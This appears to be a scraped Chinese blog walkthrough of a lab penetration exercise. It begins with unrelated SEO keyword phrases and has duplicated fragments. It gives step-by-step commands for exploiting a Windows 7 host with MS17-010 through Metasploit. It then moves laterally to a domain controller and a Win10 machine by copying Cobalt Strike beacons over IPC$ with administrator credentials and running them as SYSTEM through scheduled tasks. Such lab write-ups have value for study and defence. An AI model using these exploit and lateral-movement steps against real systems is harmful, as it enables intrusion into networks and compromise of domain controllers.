iis做的网站手机怎么访问,黄冈公司网站建设平台,万网注册域名查询官方网站,门户网站建设维护以前讲过用cs_smb_beacon上线不出网机器#xff0c;但是真实的网络拓扑肯定不止这么一层的网络#xff01;
所以我就来搭建一个复杂一点的网络环境#xff01;#xff01; 当然了#xff0c;这三台电脑之间都是不同的网段#xff0c;#xff08;但是同属于一个域环境但是真实的网络拓扑肯定不止这么一层的网络
所以我就来搭建一个复杂一点的网络环境 当然了这三台电脑之间都是不同的网段但是同属于一个域环境
来看网络拓扑 1.先拿下web机器
这里拿下的方式有很多种那么我就先讲最简单的一种没错又是永恒之蓝但是现实生活中肯定是不会将一台存在永恒之蓝的win7作为web机器的
kali
msfconsolesearch ms17-010
use 0set rhost 192.168.43.131
exploit
成功拿下shell 于是先上线到cs 监听器木马这些我就不多说原理了 记得选上这个没有(stagless)的木马
然后上传点击上线可谓是一气呵成 这样我们就上线了第一台web机器
2.拿下二层不出网DC
这里我选择生成的监听器还是smb的beacon 然后木马那里就要选择带有stageless的那个木马了然后先上传到web机器
然后就是我们熟悉的颁布计划任务了
net use \\192.168.2.129\ipc$ hongrisec2024 /user:god\administratorshell net use shell copy beacon.exe \\192.168.2.129\c$shell schtasks /create /s 192.168.2.129 /tn beacon /sc onstart /tr c:\beacon.exe /ru system /fshell schtasks /run /s 192.168.2.129 /i /tn beaconlink 192.168.2.129
这样就能上线了第二层不出网的域控 3.上线第三层不出网Win10
这里的操作和前面的操作不一样前面的连接都是用的正向连接现在我们来玩一下反向连接
先在cs执行以下操作选择转发上线 然后你生成一个监听器就是记住你的端口别冲突了 然后就是生成以这个为监听器的木马并且颁布计划任务了
net use \\192.168.1.130\ipc$ hongrisec2024 /user:god\administratorshell net use shell copy last.exe \\192.168.1.130\c$shell schtasks /create /s 192.168.1.130 /tn last /sc onstart /tr c:\last.exe /ru system /fshell schtasks /run /s 192.168.1.130 /i /tn lastlink 192.168.1.130
最后是能看见是能够以last.exe去上线这个木马的 可以看见是能够执行命令的
